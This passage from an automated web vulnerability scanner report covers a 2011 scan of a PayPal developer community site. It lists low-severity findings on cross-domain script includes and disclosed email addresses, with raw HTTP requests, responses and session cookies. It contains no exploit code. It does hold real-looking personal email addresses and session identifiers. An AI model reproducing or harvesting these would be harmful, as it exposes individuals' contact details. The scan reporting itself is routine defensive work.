Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.254. https://www.x.com/projects/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /projects/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=83836 t=1313157103895348
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.255. https://www.x.com/search.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /search.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=25842 t=1313157255790926
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.256. https://www.x.com/tags

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=270750 t=1313157263884148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.257. https://www.x.com/tags/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tags/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=139885 t=1313157103442140
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.258. https://www.x.com/threads

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /threads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /threads HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=399265 t=1313157098002095
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

8. Email addresses disclosed
There are 36 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. https://www.x.com/community/feeds/blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/blogs

Issue detail

The following email address was disclosed in the response:

Request

GET /community/feeds/blogs HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Last-Modified: Fri, 12 Aug 2011 05:00:01 GMT
Etag: "1313125201939"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=32459 t=1313157008547513
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
<author>travis@travisrobertson.com</author>
...[SNIP]...

8.2. https://www.x.com/community/feeds/documents

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/documents

Issue detail

The following email addresses were disclosed in the response:

Request

GET /community/feeds/documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:09 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 11 Aug 2011 22:17:57 GMT
Etag: "1313101077659"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=39783 t=1313157009161570
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
s scheduled to be available in July 2011.&amp;#160; If you are interested in evaluating and developing for the new version, please send your request to &lt;a class="jive-link-email-small" href="mailto:payflowbeta@paypal.com"&gt;payflowbeta@paypal.com&lt;/a&gt;.&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;May 25, 2011 (Pilot Environment Only.&amp;#160; Released to production on Ju
...[SNIP]...
amp;BILLTOCOUNTRY[3]=840&amp;amp;BILLTOZIP[5]=12345&amp;amp;&lt;br/&gt;BILLTOPHONENUM[12]=555-243-7689&amp;amp;BILLTOEMAIL&lt;span&gt;[22]&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com"&gt;=Joe.Smith@anyemail.com&lt;/a&gt;&lt;span&gt;&amp;amp;&lt;br/&gt;BILLTOFIRSTNAME[3]=Joe&amp;amp;BILLTOLASTNAME[5]=Smith&amp;amp;SHIPTOSTREET&lt;/span&gt;[12]=123 Main St.&lt;br/&gt;&amp;amp;SHIPTOCITY[8]=San Jose&amp;amp;SHI
...[SNIP]...
STATE[2]=CA&amp;amp;SHIPTOCOUNTRY[3]=840&amp;amp;&lt;br/&gt;SHIPTOZIP[5]=12345&amp;amp;SHIPTOPHONE[12]=555-243-7689&amp;amp;SHIPTOEMAIL[22]&lt;br/&gt;=&lt;a class="jive-link-email-small" href="mailto:=Joe.Smith@anyemail.com"&gt;Joe.Smith@anyemail.com&lt;/a&gt;&lt;span&gt;&amp;amp;SHIPTOFIRSTNAME[3]=Joe&amp;amp;SHIPTOLASTNAME[5]=Smith&lt;br/&gt;&amp;amp;USER[9]&lt;/span&gt;=toddprov4&amp;amp;VENDOR[9]=toddprov4&amp;amp;PARTNER[8]=VeriSign&amp;amp;P
...[SNIP]...

8.3. https://www.x.com/community/feeds/messages

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/messages

Issue detail

The following email addresses were disclosed in the response:

Request

GET /community/feeds/messages HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:15 GMT
Server: Apache-Coyote/1.1
Last-Modified: Fri, 12 Aug 2011 13:49:18 GMT
Etag: "1313156958073"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=11113 t=1313157015643994
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
&lt;/span&gt;&amp;#160; objBodyPart.Charset = "UTF-8"&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&amp;#160; objEmail.From = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com"&gt;contact@XXXXXXX.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;&amp;#160; objEmail.To = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com"&gt;contact@YYYYYYY.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; objEmail.Subject = "IPN - Test One"&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; objEmail.Textbody
...[SNIP]...
bjBodyPart.Charset = "UTF-8"&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; &lt;span&gt; &lt;/span&gt;&lt;span&gt;objEmail.From = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com"&gt;contact@XXXXXXX.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;&amp;#160; &lt;span&gt; &lt;/span&gt;&lt;span&gt;objEmail.To = "&lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com"&gt;contact@YYYYYYY.com&lt;/a&gt;&lt;span&gt;"&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;objEmail.Subject = "IPN - Test Two "&lt;/p&gt;&lt;p&gt;&lt;span&gt; &lt;/span&gt;objEmail.Textbody = "Verified"&lt;/p&gt
...[SNIP]...
<author>rubbyraj22@yahoo.com</author>
...[SNIP]...

8.4. https://www.x.com/community/feeds/popularthreads

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/popularthreads

Issue detail

The following email address was disclosed in the response:

Request

GET /community/feeds/popularthreads HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:10 GMT
Server: Apache-Coyote/1.1
Last-Modified: Fri, 12 Aug 2011 13:48:31 GMT
Etag: "1313156911867"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=116756 t=1313157010798881
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
;/p&gt;&lt;p&gt;My sandbox business account email is&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:bzdmit_1243814267_biz@gmail.com"&gt;bzdmit_1243814267_biz@gmail.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Thank you very much in advance and best regards,&lt;/p&gt;&lt;p&gt;Dmitry&lt;/p&gt;&lt;/div
...[SNIP]...

8.5. https://www.x.com/community/feeds/unansweredthreads

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/unansweredthreads

Issue detail

The following email address was disclosed in the response:

Request

GET /community/feeds/unansweredthreads?community=2114 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 02 Jun 2011 12:51:07 GMT
Etag: "1307019067561"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=8661 t=1313157027820792
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
p direct payment on my account. thanks&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;a class="jive-link-email-small" href="mailto:seller_1282344506_biz@gmail.com"&gt;seller_1282344506_biz@gmail.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;!-- [DocumentBodyEnd:fe1ef89b-0a60-4b13-88f9-86317b895cde] --&gt;</description>
...[SNIP]...

8.6. https://www.x.com/community/ppx/businesspayments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:dl-pp-businesspayments@paypal.com"><em>dl-pp-businesspayments@paypal.com</em>
...[SNIP]...
<a href="mailto:dl-pp-businesspayments@paypal.com">
...[SNIP]...

8.7. https://www.x.com/community/ppx/devchallenge

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:contest@paypal.com">contest@paypal.com</a>
...[SNIP]...

8.8. https://www.x.com/community/ppx/devchallenge/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:contest@paypal.com">contest@paypal.com</a>
...[SNIP]...

8.9. https://www.x.com/community/ppx/devtalk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:paypalstory@accesspr.com">
...[SNIP]...

8.10. https://www.x.com/community/ppx/devzone

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:travis@travisrobertson.com">travis@travisrobertson.com</a>
...[SNIP]...

8.11. https://www.x.com/community/ppx/global/uk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The following email address was disclosed in the response:

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:ukdevelopers@paypal.com">
...[SNIP]...

8.12. https://www.x.com/docs/DOC-1106

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-1106 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/button_manager
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b; Expires=Sun, 11-Sep-2011 13:40:10 GMT; Path=/
Vary: User-Agent
JP: D=139511 t=1313156410450395
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:&amp;L_BUTTONVAR0=business=merchant@abc.com">&amp;L_BUTTONVAR0=business=merchant@abc.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:business=XX-usbiz@paypal.com">business=XX-usbiz@paypal.com</a>
...[SNIP]...

8.13. https://www.x.com/docs/DOC-1106.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1106.pdf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /docs/DOC-1106.pdf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:11 GMT
Server: Apache-Coyote/1.1
Pragma: expires
Cache-Control: no-cache, private
Content-disposition: attachment
Content-Type: application/pdf;charset=UTF-8
Content-Language: en-US
JP: D=725131 t=1313157250843835
Vary: User-Agent
Connection: close

%PDF-1.4
%....
4 0 obj
<<
/Producer (Apache FOP Version 0.95beta)
/CreationDate (D:20110812065411-07'00')
>>
endobj
5 0 obj
<<
/N 3
/Length 14 0 R
/Filter /FlateDecode
>>
stream
x...wTS.....7.P.
...[SNIP]...
< /URI (mailto:&L_BUTTONVAR0=business=merchant@abc.com)
/S /URI >
...[SNIP]...
< /URI (mailto:business=XX-usbiz@paypal.com)
/S /URI >
...[SNIP]...

8.14. https://www.x.com/docs/DOC-1431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1431

Issue detail

The following email address was disclosed in the response:

Request

GET /docs/DOC-1431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

